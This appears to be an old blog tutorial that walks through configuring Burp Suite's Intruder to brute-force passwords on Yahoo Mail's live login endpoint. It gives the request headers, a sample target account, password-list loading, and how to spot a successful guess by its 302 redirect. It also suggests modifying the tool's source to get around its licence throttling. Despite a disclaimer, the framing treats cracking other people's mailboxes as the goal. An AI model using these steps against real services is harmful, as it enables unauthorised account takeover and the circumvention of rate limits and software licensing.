Hacker's Delight: Burp Suite
For someone who has been a hacker for most of his life, there are few things more satisfying than finding a well-crafted and powerful tool with which to automate the task.
Such is Burp Suite, a fast and well-documented app from Portswigger.net. Written in Java, the GUI is pure pleasure to use. You will need the Sun 1.6 development package, including "javac" and "java" binaries, to be properly installed first. If you don't have Java and you are serious about pen-testing, then you should get this anyway. Once the Sun package has been downloaded & installed on your (hopefully) Linux box, Burp Suite 1.2 can be downloaded directly from Portswigger at
and installed in its own folder. The command ./suite.bat will bring up the gui.
For the purposes of this tutorial, I will use only the Burp Intruder functionality. However, note that there are many other uses for this slick application, including a sophisticated spider, and a proxy which will intercept all HTTP requests to allow manipulation of the data.
To begin, we fire up Burp Suite & click on the "Intruder" tab, and then select the "target" sub-tab. Here I have defined:
"use SSL": do NOT check
(Note that the specification of the Yahoo Mail server does not in any way suggest that I am endorsing the usage of Yahoo servers as targets. I merely chose it to illustrate the steps one must follow in order to configure Burp Suite for pentesting any target. Burp Suite was never used by the author in an actual attack on the Yahoo servers, nor does he condone its use for such purposes by anyone else.)
Next, click the Positions tab which is the gut of Burp Suite. Here, the contents of the request are inserted. The attack type should be "sniper" and the first section, in the white textfield, should be the headers:
POST /config/login? HTTP/1.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:188.8.131.52) Gecko/2009020911
Ubuntu/8.04 (hardy) Firefox/3.0.6
(Note: These headers can be trapped by aborting a post from the Yahoo log-in script at https://login.yahoo.com/config/login_verify2?&.src=ym Once the post is aborted, the headers can be viewed by examining any one of several available tools, and then copied & pasted into Intruder using Ctrl-V.)
Following the headers, and still under the positions tab, we must leave a blank line as this is how the http protocol differentiates the request header from the body. The form fields can be gleaned from viewing the Yahoo log-in source code but I am including them here also:
The most relevant fields here are the email address, which is assigned to the "login" field, (thaihoney28.yahoo.com in the above example), and the "passwd" field which denotes the login password and which I have enclosed in dollar signs. Burp Intruder will actually use a special symbol, and not dollar signs, when you click on the Add "$" button on the right side of the panel. You can put anything you want between these symbols because Intruder will systematically replace everything therein with the payloads and once it starts sending the requests.
The payloads tab is thus used to specify our password list. These can be defined a number of ways but the easiest is to select preset list and then clicking the load button and specifying an ascii password list with conventional CR/LF separators.
The salient feature of the options tab is to delineate the server responses which will be grepped by Intruder and displayed in the output box. In the case of Yahoo, if the password is no good, you will receive both "error" and "not found" strings in the response body for the first few dozen attempts. After about 10 to 30 failed attempts, Yahoo gets suspicious and requires ye olde image verification characters. These can be identified by adding "in the image below" to the grep/match listbox. But there's not much you can do about these ultimately, at least not as far as I know.
If, however, the password is guessed correctly, then Intruder will display a 302 status code (http redirect) which redirects to the target's mailbox. The grep function (grep tab) can be used to identify specific strings from the login page or the results view can be sorted by clicking on the status colum header so as to display 302's on top, thus identifying a successful login. (There are probably other ways to signal a hit but the most effective way that I have found of of acting on positive outcomes is to modify Portswigger's java source code, as explained in the next paragraph.)
Now, the caveats. Portswigger has time-throttled the Java class file in the demo version and the submissions are intolerably slow. Don't expect to crack any Yahoo email boxes using it. So you have a choice here: (1) Buy into Portswigger for a couple of hundred pounds, (chump change for a hacker, right? he he) or (2) Buy "The Web Application Hackers Handbook" and get Java source code which can be modified to circumvent the time throttling, as well as custom notification of successful hits. If there is enough interest in this article, I will consider writing another article explaining how to do this.
While not successful ultimately against the big boys like Yahoo, Burp Suite is one fine tool in the pentester's toolbox and will succeed with many other targets. Many kudos to its author(s).
All ideas about all this are welcomed.
Your humble servant, Whistler.